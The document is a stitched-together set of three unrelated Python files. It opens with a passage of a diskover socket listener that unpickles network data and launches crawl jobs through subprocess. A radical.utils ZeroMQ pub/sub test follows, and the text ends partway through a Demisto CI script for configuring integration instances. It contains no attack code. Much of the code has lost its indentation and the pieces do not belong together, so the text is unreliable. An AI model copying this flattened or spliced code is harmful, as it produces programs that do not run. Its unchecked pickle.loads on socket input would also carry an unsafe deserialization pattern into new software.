logger.debug('received data: %s' % data)
if not data:
q.task_done()
# close connection to client
clientsock.close()
logger.info("[thread-%s]: %s closed connection" % (threadnum, str(addr)))
continue
# check if ping msg
if data == 'ping':
logger.info("[thread-%s]: Got ping from %s" % (threadnum, str(addr)))
# send pong reply
message = b'pong'
clientsock.send(message)
logger.debug('sending data: %s' % message)
else:
# strip away any headers sent by curl
data = data.split('\r\n')[-1]
logger.info("[thread-%s]: Got command from %s" % (threadnum, str(addr)))
# load json and store in dict
command_dict = json.loads(data)
logger.debug(command_dict)
# run command from json data
run_command(threadnum, command_dict, clientsock, cliargs, logger)
q.task_done()
# close connection to client
clientsock.close()
logger.info("[thread-%s]: %s closed connection" % (threadnum, str(addr)))
except (ValueError, TypeError) as e:
q.task_done()
logger.error("[thread-%s]: Invalid JSON from %s: (%s)" % (threadnum, str(addr), e))
            message = b'{"msg": "error", "error": "' + str(e).encode('utf-8') + b'"}\n'
clientsock.send(message)
logger.debug(message)
# close connection to client
clientsock.close()
logger.info("[thread-%s]: %s closed connection" % (threadnum, str(addr)))
pass
except socket.error as e:
q.task_done()
logger.error("[thread-%s]: Socket error (%s)" % (threadnum, e))
# close connection to client
clientsock.close()
logger.info("[thread-%s]: %s closed connection" % (threadnum, str(addr)))
pass
def recvall(sock, count):
buf = b''
while count:
newbuf = sock.recv(count)
if not newbuf: return None
buf += newbuf
count -= len(newbuf)
return buf
def recv_one_message(sock):
lengthbuf = recvall(sock, 4)
if not lengthbuf:
return None
length, = struct.unpack('!I', lengthbuf)
return recvall(sock, length)
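# Illustrative counterpart to recv_one_message (not used by this module): the tree
# walk client is assumed to frame every pickled payload with a 4-byte big-endian
# length prefix, which is exactly what recvall()/recv_one_message() expect.
def send_one_message(sock, data):
    length = struct.pack('!I', len(data))
    sock.sendall(length + data)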
def socket_thread_handler_twc(threadnum, q, q_kill, lock, rootdir, num_sep, level,
batchsize, cliargs, logger, reindex_dict):
"""This is the socket thread handler tree walk client function.
Stream of directory listings (pickle) from diskover treewalk
client connections are enqueued to redis rq queue.
"""
while True:
try:
c = q.get()
clientsock, addr = c
logger.debug(clientsock)
logger.debug(addr)
while True:
data = recv_one_message(clientsock)
#logger.debug(data)
if not data:
break
if data == b'SIGKILL' or data == 'SIGKILL':
q_kill.put(b'SIGKILL')
break
data_decoded = pickle.loads(data)
logger.debug(data_decoded)
# enqueue to redis
batch = []
for root, dirs, files in data_decoded:
if len(dirs) == 0 and len(files) == 0 and not cliargs['indexemptydirs']:
continue
batch.append((root, files))
batch_len = len(batch)
if batch_len >= batchsize:
q_crawl.enqueue(scrape_tree_meta, args=(batch, cliargs, reindex_dict,))
del batch[:]
if cliargs['adaptivebatch']:
batchsize = adaptive_batch(q_crawl, cliargs, batchsize)
if len(batch) > 0:
# add any remaining in batch to queue
q_crawl.enqueue(scrape_tree_meta, args=(batch, cliargs, reindex_dict,))
del batch[:]
# close connection to client
clientsock.close()
logger.info("[thread-%s]: %s closed connection" % (threadnum, str(addr)))
q.task_done()
except socket.error as e:
logger.error("[thread-%s]: Socket error (%s)" % (threadnum, e))
def start_socket_server(cliargs, logger):
"""This is the start socket server function.
It opens a socket and waits for remote commands.
"""
global clientlist
# set thread/connection limit
max_connections = config['listener_maxconnections']
# Queue for socket threads
q = Queue.Queue(maxsize=max_connections)
try:
# create TCP socket object
serversock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
serversock.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
host = config['listener_host'] # default is localhost
port = config['listener_port'] # default is 9999
# bind to port
serversock.bind((host, port))
# start listener
serversock.listen(max_connections)
# set up the threads and start them
for i in range(max_connections):
# create thread
t = threading.Thread(target=socket_thread_handler, args=(i, q, cliargs, logger,))
t.daemon = True
t.start()
while True:
logger.info("Waiting for connection, listening on %s port %s TCP (ctrl-c to shutdown)"
% (str(host), str(port)))
# establish connection
clientsock, addr = serversock.accept()
logger.debug(clientsock)
logger.debug(addr)
logger.info("Got a connection from %s" % str(addr))
# add client to list
client = [clientsock, addr]
clientlist.append(client)
# add task to Queue
q.put(client)
except socket.error as e:
serversock.close()
logger.error("Error opening socket (%s)" % e)
sys.exit(1)
except KeyboardInterrupt:
print('\nCtrl-c keyboard interrupt received, shutting down...')
q.join()
serversock.close()
sys.exit(0)
def start_socket_server_twc(rootdir_path, num_sep, level, batchsize, cliargs, logger, reindex_dict):
"""This is the start socket server function.
It opens a socket and waits for remote commands.
"""
global clientlist
# set thread/connection limit
max_connections = config['listener_maxconnections']
# Queue for socket threads
q = Queue.Queue(maxsize=max_connections)
q_kill = Queue.Queue()
    lock = threading.Lock()
    starttime = time.time()  # fallback in case shutdown is signalled before any client connects
try:
# create TCP socket object
serversock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
serversock.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
host = config['listener_host'] # default is localhost
port = config['listener_twcport'] # default is 9998
# bind to port
serversock.bind((host, port))
# start listener
serversock.listen(max_connections)
# set up the threads and start them
for i in range(max_connections):
# create thread
t = threading.Thread(target=socket_thread_handler_twc, args=(i, q, q_kill, lock, rootdir_path, num_sep,
level, batchsize, cliargs, logger, reindex_dict,))
t.daemon = True
t.start()
while True:
if q_kill.qsize() > 0:
logger.info("Received signal to shutdown socket server")
q.join()
serversock.close()
return starttime
logger.info("Waiting for connection, listening on %s port %s TCP (ctrl-c to shutdown)"
% (str(host), str(port)))
# establish connection
clientsock, addr = serversock.accept()
logger.debug(clientsock)
logger.debug(addr)
logger.info("Got a connection from %s" % str(addr))
# add client to list
client = [clientsock, addr]
clientlist.append(client)
# set start time to first connection
if len(clientlist) == 1:
starttime = time.time()
# add task to Queue
q.put(client)
except socket.error as e:
serversock.close()
logger.error("Error opening socket (%s)" % e)
sys.exit(1)
except KeyboardInterrupt:
print('\nCtrl-c keyboard interrupt received, shutting down...')
serversock.close()
sys.exit(0)
def run_command(threadnum, command_dict, clientsock, cliargs, logger):
"""This is the run command function.
It runs commands from the listener socket
using values in command_dict.
"""
global socket_tasks
global clientlist
# try to get index name from command or use from diskover config file
try:
index = str(command_dict['index'])
except KeyError:
index = str(config['index'])
pass
# try to get worker batch size from command or use default
try:
batchsize = str(command_dict['batchsize'])
except KeyError:
batchsize = str(cliargs['batchsize'])
pass
# try to get adaptive batch option from command or use default
try:
adaptivebatch = str(command_dict['adaptivebatch'])
except KeyError:
adaptivebatch = str(cliargs['adaptivebatch'])
pass
try:
action = command_dict['action']
pythonpath = config['python_path']
diskoverpath = config['diskover_path']
# set up command for different action
if action == 'crawl':
path = command_dict['path']
cmd = [pythonpath, diskoverpath, '-b', batchsize,
'-i', index, '-d', path, '-q']
elif action == 'finddupes':
cmd = [pythonpath, diskoverpath, '-b', batchsize,
'-i', index, '--finddupes', '-q']
elif action == 'hotdirs':
index2 = str(command_dict['index2'])
cmd = [pythonpath, diskoverpath, '-b', batchsize,
'-i', index, '--hotdirs', index2, '-q']
elif action == 'reindex':
try:
recursive = command_dict['recursive']
except KeyError:
recursive = 'false'
pass
path = command_dict['path']
if recursive == 'true':
cmd = [pythonpath, diskoverpath, '-b', batchsize,
'-i', index, '-d', path, '-R', '-q']
else:
cmd = [pythonpath, diskoverpath, '-b', batchsize,
'-i', index, '-d', path, '-r', '-q']
elif action == 'updatedirsizes':
try:
recursive = command_dict['recursive']
except KeyError:
recursive = 'false'
pass
if recursive == 'true':
cmd = [pythonpath, diskoverpath, '-b', batchsize,
'-i', index, '--dircalcsonly', '-q']
else:
path = command_dict['path']
cmd = [pythonpath, diskoverpath, '-b', batchsize,
'-i', index, '-d', path, '--dircalcsonly', '--maxdcdepth', '0', '-q']
elif action == 'kill':
taskid = command_dict['taskid']
logger.info("[thread-%s]: Kill task message received! (taskid:%s)",
threadnum, taskid)
# do something here to kill task (future)
message = b'{"msg": "taskkilled"}\n'
clientsock.send(message)
return
else:
logger.warning("Unknown action")
message = b'{"error": "unknown action"}\n'
clientsock.send(message)
return
# add adaptive batch
if (adaptivebatch == "True" or adaptivebatch == "true"):
cmd.append('-a')
# run command using subprocess
starttime = time.time()
taskid = str(uuid.uuid4()).encode('utf-8')
# start process
process = subprocess.Popen(cmd, stdout=subprocess.PIPE, stderr=subprocess.PIPE)
# add process to socket_tasks dict
socket_tasks[taskid] = process
message = b'{"msg": "taskstart", "taskid": "' + taskid + b'"}\n'
clientsock.send(message)
logger.info("[thread-%s]: Running command (taskid:%s)",
threadnum, taskid.decode('utf-8'))
logger.info(cmd)
output, error = process.communicate()
# send exit msg to client
exitcode = str(process.returncode).encode('utf-8')
logger.debug('Command output:')
logger.debug(output.decode('utf-8'))
logger.debug('Command error:')
logger.debug(error.decode('utf-8'))
elapsedtime = str(get_time(time.time() - starttime)).encode('utf-8')
logger.info("Finished command (taskid:%s), exit code: %s, elapsed time: %s"
% (taskid.decode('utf-8'), exitcode.decode('utf-8'), elapsedtime.decode('utf-8')))
message = b'{"msg": "taskfinish", "taskid": "%s", "exitcode": %s, "elapsedtime": "%s"}\n' \
% (taskid, exitcode, elapsedtime)
clientsock.send(message)
except ValueError:
logger.warning("Value error")
message = b'{"error": "value error"}\n'
clientsock.send(message)
pass
except socket.error as e:
logger.error("[thread-%s]: Socket error (%s)" % (threadnum, e))
pass
|
test_zmq_pubsub.py
|
#!/usr/bin/env python
__author__ = 'Radical.Utils Development Team'
__copyright__ = 'Copyright 2019, RADICAL@Rutgers'
__license__ = 'MIT'
import time
import threading as mt
import radical.utils as ru
# ------------------------------------------------------------------------------
#
def test_zmq_pubsub():
'''
    create a bridge, 2 producers (A, B) and 2 consumers (C, D).  Producer A
    publishes c_a messages and producer B publishes c_b (twice as many), both
    at the same rate.
    Ensure that
    - the number of messages received per producer reflects the number sent
- the local order of messages is preserved
- messages are received exactly once (no messages get lost / duplicated)
'''
c_a = 200
c_b = 400
cfg = ru.Config(cfg={'uid' : 'test_pubsub',
'channel' : 'test',
'kind' : 'pubsub',
'log_level': 'error',
'path' : '/tmp/',
'sid' : 'test_sid',
'bulk_size': 0,
'stall_hwm': 1,
})
b = ru.zmq.PubSub(cfg)
b.start()
assert(b.addr_in != b.addr_out)
assert(b.addr_in == b.addr_pub)
assert(b.addr_out == b.addr_sub)
data = dict()
for i in 'ABCD':
data[i] = dict()
for j in 'AB':
data[i][j] = 0
def cb(uid, topic, msg):
if msg['idx'] is None:
return False
data[uid][msg['src']] += 1
cb_C = lambda t,m: cb('C', t, m)
cb_D = lambda t,m: cb('D', t, m)
ru.zmq.Subscriber(channel=cfg['channel'], url=str(b.addr_sub),
topic='topic', cb=cb_C)
ru.zmq.Subscriber(channel=cfg['channel'], url=str(b.addr_sub),
topic='topic', cb=cb_D)
time.sleep(0.1)
# --------------------------------------------------------------------------
def work_pub(uid, n, delay):
pub = ru.zmq.Publisher(channel=cfg['channel'], url=str(b.addr_pub))
idx = 0
while idx < n:
time.sleep(delay)
pub.put('topic', {'src': uid,
'idx': idx})
idx += 1
data[uid][uid] += 1
# send EOF
pub.put('topic', {'src': uid,
'idx': None})
# --------------------------------------------------------------------------
t_a = mt.Thread(target=work_pub, args=['A', c_a, 0.005])
t_b = mt.Thread(target=work_pub, args=['B', c_b, 0.005])
t_a.start()
t_b.start()
t_a.join()
t_b.join()
b.stop()
time.sleep(0.1)
assert(data['A']['A'] == c_a)
assert(data['B']['B'] == c_b)
assert(data['C']['A'] + data['C']['B'] +
data['D']['A'] + data['D']['B'] == 2 * (c_a + c_b))
# ------------------------------------------------------------------------------
# run tests if called directly
if __name__ == '__main__':
test_zmq_pubsub()
# ------------------------------------------------------------------------------
|
configure_and_test_integration_instances.py
|
from __future__ import print_function
import argparse
import ast
import json
import os
import subprocess
import sys
import uuid
import zipfile
from datetime import datetime
from distutils.version import LooseVersion
from enum import IntEnum
from pprint import pformat
from threading import Thread
from time import sleep
from typing import List, Tuple, Union
from urllib.parse import quote_plus
import demisto_client
from demisto_sdk.commands.common.constants import FileType
from demisto_sdk.commands.common.tools import run_threads_list, run_command, get_yaml, \
str2bool, format_version, find_type
from demisto_sdk.commands.test_content.constants import SSH_USER
from demisto_sdk.commands.test_content.mock_server import MITMProxy, run_with_mock, RESULT
from demisto_sdk.commands.test_content.tools import update_server_configuration, is_redhat_instance
from demisto_sdk.commands.test_content.TestContentClasses import BuildContext
from demisto_sdk.commands.validate.validate_manager import ValidateManager
from ruamel import yaml
from Tests.Marketplace.search_and_install_packs import search_and_install_packs_and_their_dependencies, \
upload_zipped_packs, install_all_content_packs_for_nightly
from Tests.scripts.utils.log_util import install_logging
from Tests.scripts.utils import logging_wrapper as logging
from Tests.test_content import get_server_numeric_version
from Tests.test_integration import __get_integration_config, __test_integration_instance, disable_all_integrations
from Tests.tools import run_with_proxy_configured
from Tests.update_content_data import update_content
MARKET_PLACE_MACHINES = ('master',)
SKIPPED_PACKS = ['NonSupported', 'ApiModules']
NO_PROXY = ','.join([
'oproxy.demisto.ninja',
'oproxy-dev.demisto.ninja',
])
NO_PROXY_CONFIG = {'python.pass.extra.keys': f'--env##no_proxy={NO_PROXY}'} # noqa: E501
DOCKER_HARDENING_CONFIGURATION = {
'docker.cpu.limit': '1.0',
'docker.run.internal.asuser': 'true',
'limit.docker.cpu': 'true',
'python.pass.extra.keys': f'--memory=1g##--memory-swap=-1##--pids-limit=256##--ulimit=nofile=1024:8192##--env##no_proxy={NO_PROXY}', # noqa: E501
'powershell.pass.extra.keys': f'--env##no_proxy={NO_PROXY}',
}
DOCKER_HARDENING_CONFIGURATION_FOR_PODMAN = {
'docker.run.internal.asuser': 'true'
}
MARKET_PLACE_CONFIGURATION = {
'content.pack.verify': 'false',
'marketplace.initial.sync.delay': '0',
'content.pack.ignore.missing.warnings.contentpack': 'true'
}
AVOID_DOCKER_IMAGE_VALIDATION = {
'content.validate.docker.images': 'false'
}
ID_SET_PATH = './artifacts/id_set.json'
class Running(IntEnum):
CI_RUN = 0
WITH_OTHER_SERVER = 1
WITH_LOCAL_SERVER = 2
class Server:
def __init__(self, internal_ip, port, user_name, password):
self.__ssh_client = None
self.__client = None
self.internal_ip = internal_ip
self.ssh_tunnel_port = port
self.user_name = user_name
self.password = password
def __str__(self):
return self.internal_ip
@property
def client(self):
if self.__client is None:
self.__client = self.reconnect_client()
return self.__client
def reconnect_client(self):
self.__client = demisto_client.configure(f'https://localhost:{self.ssh_tunnel_port}',
verify_ssl=False,
username=self.user_name,
password=self.password)
return self.__client
def add_server_configuration(self, config_dict, error_msg, restart=False):
update_server_configuration(self.client, config_dict, error_msg)
if restart:
self.exec_command('sudo systemctl restart demisto')
def exec_command(self, command):
subprocess.check_output(f'ssh {SSH_USER}@{self.internal_ip} {command}'.split(),
stderr=subprocess.STDOUT)
def get_id_set(id_set_path) -> Union[dict, None]:
"""
Used to collect the ID set so it can be passed to the Build class on init.
:return: ID set as a dict if it exists.
"""
if os.path.isfile(id_set_path):
return get_json_file(id_set_path)
return None
class Build:
# START CHANGE ON LOCAL RUN #
content_path = f'{os.getenv("HOME")}/project' if os.getenv('CIRCLECI') else os.getenv('CI_PROJECT_DIR')
test_pack_target = f'{os.getenv("HOME")}/project/Tests' if os.getenv('CIRCLECI') else f'{os.getenv("CI_PROJECT_DIR")}/Tests' # noqa
key_file_path = 'Use in case of running with non local server'
run_environment = Running.CI_RUN
env_results_path = f'{os.getenv("ARTIFACTS_FOLDER")}/env_results.json'
DEFAULT_SERVER_VERSION = '99.99.98'
# END CHANGE ON LOCAL RUN #
def __init__(self, options):
self._proxy = None
self.git_sha1 = options.git_sha1
self.branch_name = options.branch
self.ci_build_number = options.build_number
self.is_nightly = options.is_nightly
self.ami_env = options.ami_env
self.server_to_port_mapping, self.server_numeric_version = self.get_servers(options.ami_env)
self.secret_conf = get_json_file(options.secret)
self.username = options.user if options.user else self.secret_conf.get('username')
self.password = options.password if options.password else self.secret_conf.get('userPassword')
self.servers = [Server(internal_ip,
port,
self.username,
self.password) for internal_ip, port in self.server_to_port_mapping.items()]
self.is_private = options.is_private
conf = get_json_file(options.conf)
self.tests = conf['tests']
self.skipped_integrations_conf = conf['skipped_integrations']
self.unmockable_integrations = conf['unmockable_integrations']
id_set_path = options.id_set_path if options.id_set_path else ID_SET_PATH
self.id_set = get_id_set(id_set_path)
self.test_pack_path = options.test_pack_path if options.test_pack_path else None
self.tests_to_run = self.fetch_tests_list(options.tests_to_run)
self.content_root = options.content_root
self.pack_ids_to_install = self.fetch_pack_ids_to_install(options.pack_ids_to_install)
self.service_account = options.service_account
@property
def proxy(self) -> MITMProxy:
"""
A property method that should create and return a single proxy instance through out the build
Returns:
The single proxy instance that should be used in this build.
"""
if not self._proxy:
self._proxy = MITMProxy(self.servers[0].internal_ip,
logging_module=logging,
build_number=self.ci_build_number,
branch_name=self.branch_name)
return self._proxy
@staticmethod
def fetch_tests_list(tests_to_run_path: str):
"""
Fetches the test list from the filter.
:param tests_to_run_path: Path to location of test filter.
:return: List of tests if there are any, otherwise empty list.
"""
tests_to_run = []
with open(tests_to_run_path, "r") as filter_file:
tests_from_file = filter_file.readlines()
for test_from_file in tests_from_file:
test_clean = test_from_file.rstrip()
tests_to_run.append(test_clean)
return tests_to_run
@staticmethod
def fetch_pack_ids_to_install(packs_to_install_path: str):
"""
        Fetches the pack IDs to install from the packs-to-install file.
:param packs_to_install_path: Path to location of pack IDs to install file.
:return: List of Pack IDs if there are any, otherwise empty list.
"""
        pack_ids = []
        with open(packs_to_install_path, "r") as filter_file:
            packs_from_file = filter_file.readlines()
            for pack_from_file in packs_from_file:
                pack_clean = pack_from_file.rstrip()
                pack_ids.append(pack_clean)
        return pack_ids
@staticmethod
def get_servers(ami_env):
env_conf = get_env_conf()
server_to_port_mapping = map_server_to_port(env_conf, ami_env)
if Build.run_environment == Running.CI_RUN:
server_numeric_version = get_server_numeric_version(ami_env)
else:
server_numeric_version = Build.DEFAULT_SERVER_VERSION
return server_to_port_mapping, server_numeric_version
def options_handler():
parser = argparse.ArgumentParser(description='Utility for instantiating and testing integration instances')
parser.add_argument('-u', '--user', help='The username for the login', required=True)
parser.add_argument('-p', '--password', help='The password for the login', required=True)
parser.add_argument('--ami_env', help='The AMI environment for the current run. Options are '
'"Server Master", "Server 6.0". '
'The server url is determined by the AMI environment.')
parser.add_argument('-g', '--git_sha1', help='commit sha1 to compare changes with')
parser.add_argument('-c', '--conf', help='Path to conf file', required=True)
parser.add_argument('-s', '--secret', help='Path to secret conf file')
parser.add_argument('-n', '--is-nightly', type=str2bool, help='Is nightly build')
parser.add_argument('-pr', '--is_private', type=str2bool, help='Is private build')
parser.add_argument('--branch', help='GitHub branch name', required=True)
parser.add_argument('--build-number', help='CI job number where the instances were created', required=True)
parser.add_argument('--test_pack_path', help='Path to where the test pack will be saved.',
default='/home/runner/work/content-private/content-private/content/artifacts/packs')
parser.add_argument('--content_root', help='Path to the content root.',
default='/home/runner/work/content-private/content-private/content')
parser.add_argument('--id_set_path', help='Path to the ID set.')
parser.add_argument('-l', '--tests_to_run', help='Path to the Test Filter.',
default='./artifacts/filter_file.txt')
parser.add_argument('-pl', '--pack_ids_to_install', help='Path to the packs to install file.',
default='./artifacts/content_packs_to_install.txt')
# disable-secrets-detection-start
parser.add_argument('-sa', '--service_account',
help=("Path to gcloud service account, is for circleCI usage. "
"For local development use your personal account and "
"authenticate using Google Cloud SDK by running: "
"`gcloud auth application-default login` and leave this parameter blank. "
"For more information go to: "
"https://googleapis.dev/python/google-api-core/latest/auth.html"),
required=False)
# disable-secrets-detection-end
options = parser.parse_args()
return options
def check_test_version_compatible_with_server(test, server_version):
"""
    Checks if a given test is compatible with the given server version.
Arguments:
test: (dict)
Test playbook object from content conf.json. May contain the following fields: "playbookID",
"integrations", "instance_names", "timeout", "nightly", "fromversion", "toversion.
server_version: (int)
The server numerical version.
Returns:
(bool) True if test is compatible with server version or False otherwise.
"""
test_from_version = format_version(test.get('fromversion', '0.0.0'))
test_to_version = format_version(test.get('toversion', '99.99.99'))
server_version = format_version(server_version)
if not LooseVersion(test_from_version) <= LooseVersion(server_version) <= LooseVersion(test_to_version):
playbook_id = test.get('playbookID')
logging.debug(
f'Test Playbook: {playbook_id} was ignored in the content installation test due to version mismatch '
f'(test versions: {test_from_version}-{test_to_version}, server version: {server_version})')
return False
return True
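# Example (illustrative): a test declaring fromversion 5.5.0 and toversion 6.0.0 is
# kept for server_version '6.0.0' but filtered out for '6.1.0', because
# LooseVersion('5.5.0') <= LooseVersion('6.1.0') <= LooseVersion('6.0.0') is False.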
def filter_tests_with_incompatible_version(tests, server_version):
"""
Filter all tests with incompatible version to the given server.
Arguments:
tests: (list)
List of test objects.
server_version: (int)
The server numerical version.
Returns:
(lst): List of filtered tests (compatible version)
"""
filtered_tests = [test for test in tests if
check_test_version_compatible_with_server(test, server_version)]
return filtered_tests
def configure_integration_instance(integration, client, placeholders_map):
"""
Configure an instance for an integration
Arguments:
integration: (dict)
Integration object whose params key-values are set
client: (demisto_client)
The client to connect to
placeholders_map: (dict)
Dict that holds the real values to be replaced for each placeholder.
Returns:
(dict): Configured integration instance
"""
integration_name = integration.get('name')
logging.info(f'Configuring instance for integration "{integration_name}"')
integration_instance_name = integration.get('instance_name', '')
integration_params = change_placeholders_to_values(placeholders_map, integration.get('params'))
is_byoi = integration.get('byoi', True)
validate_test = integration.get('validate_test', True)
integration_configuration = __get_integration_config(client, integration_name)
if not integration_configuration:
return None
# In the integration configuration in content-test-conf conf.json, the test_validate flag was set to false
if not validate_test:
logging.debug(f'Skipping configuration for integration: {integration_name} (it has test_validate set to false)')
return None
module_instance = set_integration_instance_parameters(integration_configuration, integration_params,
integration_instance_name, is_byoi, client)
return module_instance
def filepath_to_integration_name(integration_file_path):
"""Load an integration file and return the integration name.
Args:
integration_file_path (str): The path to an integration yml file.
Returns:
(str): The name of the integration.
"""
integration_yaml = get_yaml(integration_file_path)
integration_name = integration_yaml.get('name')
return integration_name
def get_integration_names_from_files(integration_files_list):
integration_names_list = [filepath_to_integration_name(path) for path in integration_files_list]
return [name for name in integration_names_list if name] # remove empty values
def get_new_and_modified_integration_files(branch_name):
"""Return 2 lists - list of new integrations and list of modified integrations since the first commit of the branch.
Args:
branch_name: The branch name against which we will run the 'git diff' command.
Returns:
(tuple): Returns a tuple of two lists, the file paths of the new integrations and modified integrations.
"""
# get changed yaml files (filter only added and modified files)
file_validator = ValidateManager(skip_dependencies=True)
file_validator.branch_name = branch_name
modified_files, added_files, _, _, _ = file_validator.get_changed_files_from_git()
new_integration_files = [
file_path for file_path in added_files if
find_type(file_path) in [FileType.INTEGRATION, FileType.BETA_INTEGRATION]
]
modified_integration_files = [
file_path for file_path in modified_files if
isinstance(file_path, str) and find_type(file_path) in [FileType.INTEGRATION, FileType.BETA_INTEGRATION]
]
return new_integration_files, modified_integration_files
def is_content_update_in_progress(client):
"""Make request to check if content is updating.
Args:
client (demisto_client): The configured client to use.
Returns:
(str): Returns the request response data which is 'true' if updating and 'false' if not.
"""
host = client.api_client.configuration.host
logging.debug(f'Making "Get" request to server - "{host}" to check if content is installing.')
# make request to check if content is updating
response_data, status_code, _ = demisto_client.generic_request_func(self=client, path='/content/updating',
method='GET', accept='application/json')
if status_code >= 300 or status_code < 200:
result_object = ast.literal_eval(response_data)
message = result_object.get('message', '')
logging.error(f"Failed to check if content is installing - with status code {status_code}\n{message}")
return 'request unsuccessful'
return response_data
def get_content_version_details(client, ami_name):
"""Make request for details about the content installed on the demisto instance.
Args:
client (demisto_client): The configured client to use.
ami_name (string): the role name of the machine
Returns:
(tuple): The release version and asset ID of the content installed on the demisto instance.
"""
host = client.api_client.configuration.host
logging.info(f'Making "POST" request to server - "{host}" to check installed content.')
# make request to installed content details
uri = '/content/installedlegacy' if ami_name in MARKET_PLACE_MACHINES else '/content/installed'
response_data, status_code, _ = demisto_client.generic_request_func(self=client, path=uri,
method='POST')
try:
result_object = ast.literal_eval(response_data)
logging.debug(f'Response was {response_data}')
except ValueError:
logging.exception('failed to parse response from demisto.')
return '', 0
if status_code >= 300 or status_code < 200:
message = result_object.get('message', '')
logging.error(f'Failed to check if installed content details - with status code {status_code}\n{message}')
return result_object.get('release', ''), result_object.get('assetId', 0)
def change_placeholders_to_values(placeholders_map, config_item):
"""Replaces placeholders in the object to their real values
Args:
placeholders_map: (dict)
Dict that holds the real values to be replaced for each placeholder.
config_item: (json object)
Integration configuration object.
Returns:
dict. json object with the real configuration.
"""
item_as_string = json.dumps(config_item)
for key, value in placeholders_map.items():
item_as_string = item_as_string.replace(key, str(value))
return json.loads(item_as_string)
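# Example (illustrative, with a hypothetical placeholder key): given
# placeholders_map = {'%%SERVER_HOST%%': 'https://1.2.3.4'} and
# config_item = {'url': '%%SERVER_HOST%%/api'}, the function returns
# {'url': 'https://1.2.3.4/api'} -- every occurrence of the key in the
# JSON-serialized object is replaced before it is loaded back.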
def set_integration_params(build,
integrations,
secret_params,
instance_names,
placeholders_map,
logging_module=logging):
"""
For each integration object, fill in the parameter values needed to configure an instance from
the secret_params taken from our secret configuration file. Because there may be a number of
    configurations for a single integration (if there are values provided in our secret conf for
    multiple different instances of the same integration), this function selects the parameter
    values for the instance whose instance_name is in 'instance_names' (taking the last matching
    entry listed in 'secret_params'). Note that this function does not return the modified
    'integrations' object; it mutates the list in place, so the caller's 'integrations' object
    already reflects the changes when this function returns.
Arguments:
build: Build object
integrations: (list of dicts)
List of integration objects whose 'params' attribute will be populated in this function.
secret_params: (list of dicts)
List of secret configuration values for all of our integrations (as well as specific
instances of said integrations).
instance_names: (list)
The names of particular instances of an integration to use the secret_params of as the
configuration values.
placeholders_map: (dict)
Dict that holds the real values to be replaced for each placeholder.
logging_module (Union[ParallelLoggingManager,logging]): The logging module to use
Returns:
(bool): True if integrations params were filled with secret configuration values, otherwise false
"""
for integration in integrations:
integration_params = [change_placeholders_to_values(placeholders_map, item) for item
in secret_params if item['name'] == integration['name']]
if integration_params:
matched_integration_params = integration_params[0]
# if there are more than one integration params, it means that there are configuration
# values in our secret conf for multiple instances of the given integration and now we
# need to match the configuration values to the proper instance as specified in the
# 'instance_names' list argument
if len(integration_params) != 1:
found_matching_instance = False
for item in integration_params:
if item.get('instance_name', 'Not Found') in instance_names:
matched_integration_params = item
found_matching_instance = True
if not found_matching_instance:
optional_instance_names = [optional_integration.get('instance_name', 'None')
for optional_integration in integration_params]
failed_match_instance_msg = 'There are {} instances of {}, please select one of them by using' \
' the instance_name argument in conf.json. The options are:\n{}'
logging_module.error(failed_match_instance_msg.format(len(integration_params),
integration['name'],
'\n'.join(optional_instance_names)))
return False
integration['params'] = matched_integration_params.get('params', {})
integration['byoi'] = matched_integration_params.get('byoi', True)
integration['instance_name'] = matched_integration_params.get('instance_name', integration['name'])
integration['validate_test'] = matched_integration_params.get('validate_test', True)
if integration['name'] not in build.unmockable_integrations:
integration['params'].update({'proxy': True})
logging.debug(
f'Configuring integration "{integration["name"]}" with proxy=True')
else:
integration['params'].update({'proxy': False})
logging.debug(
f'Configuring integration "{integration["name"]}" with proxy=False')
return True
def set_module_params(param_conf, integration_params):
"""Configure a parameter object for use in a module instance.
Each integration parameter is actually an object with many fields that together describe it. E.g. a given
parameter will have all of the following fields - "name", "display", "value", "hasvalue", "defaultValue",
etc. This function fills the "value" field for a parameter configuration object and returns it for use in
a module instance.
Args:
param_conf (dict): The parameter configuration object.
integration_params (dict): The values to use for an integration's parameters to configure an instance.
Returns:
(dict): The configured parameter object
"""
if param_conf['display'] in integration_params or param_conf['name'] in integration_params:
# param defined in conf
key = param_conf['display'] if param_conf['display'] in integration_params else param_conf['name']
if key == 'credentials':
credentials = integration_params[key]
param_value = {
'credential': '',
'identifier': credentials['identifier'],
'password': credentials['password'],
'passwordChanged': False
}
else:
param_value = integration_params[key]
param_conf['value'] = param_value
param_conf['hasvalue'] = True
elif param_conf['defaultValue']:
# if the parameter doesn't have a value provided in the integration's configuration values
# but does have a default value then assign it to the parameter for the module instance
param_conf['value'] = param_conf['defaultValue']
return param_conf
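# Example (illustrative): for param_conf = {'display': 'API Key', 'name': 'apikey',
# 'defaultValue': '', 'value': None, 'hasvalue': False} and
# integration_params = {'API Key': 'xyz'}, the function sets value to 'xyz' and
# hasvalue to True; a 'credentials' key is instead expanded into the
# identifier/password structure shown above.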
def __set_server_keys(client, integration_params, integration_name):
"""Adds server configuration keys using the demisto_client.
Args:
client (demisto_client): The configured client to use.
integration_params (dict): The values to use for an integration's parameters to configure an instance.
integration_name (str): The name of the integration which the server configurations keys are related to.
"""
if 'server_keys' not in integration_params:
return
logging.info(f'Setting server keys for integration: {integration_name}')
data: dict = {
'data': {},
'version': -1
}
for key, value in integration_params.get('server_keys').items():
data['data'][key] = value
update_server_configuration(
client=client,
server_configuration=data,
error_msg='Failed to set server keys'
)
def set_integration_instance_parameters(integration_configuration,
integration_params,
integration_instance_name,
is_byoi,
client):
"""Set integration module values for integration instance creation
The integration_configuration and integration_params should match, in that
they are for the same integration
Arguments:
integration_configuration: (dict)
dictionary of the integration configuration parameters/keys that need
filling to instantiate an instance of a given integration
integration_params: (dict)
values for a given integration taken from the configuration file in
which the secret values are stored to configure instances of various
integrations
integration_instance_name: (str)
The name of the integration instance being configured if there is one
provided in the conf.json
is_byoi: (bool)
If the integration is byoi or not
client: (demisto_client)
The client to connect to
Returns:
(dict): The configured module instance to send to the Demisto server for
instantiation.
"""
module_configuration = integration_configuration.get('configuration', {})
if not module_configuration:
module_configuration = []
if 'integrationInstanceName' in integration_params:
instance_name = integration_params['integrationInstanceName']
else:
instance_name = '{}_test_{}'.format(integration_instance_name.replace(' ', '_'), str(uuid.uuid4()))
# define module instance
module_instance = {
'brand': integration_configuration['name'],
'category': integration_configuration['category'],
'configuration': integration_configuration,
'data': [],
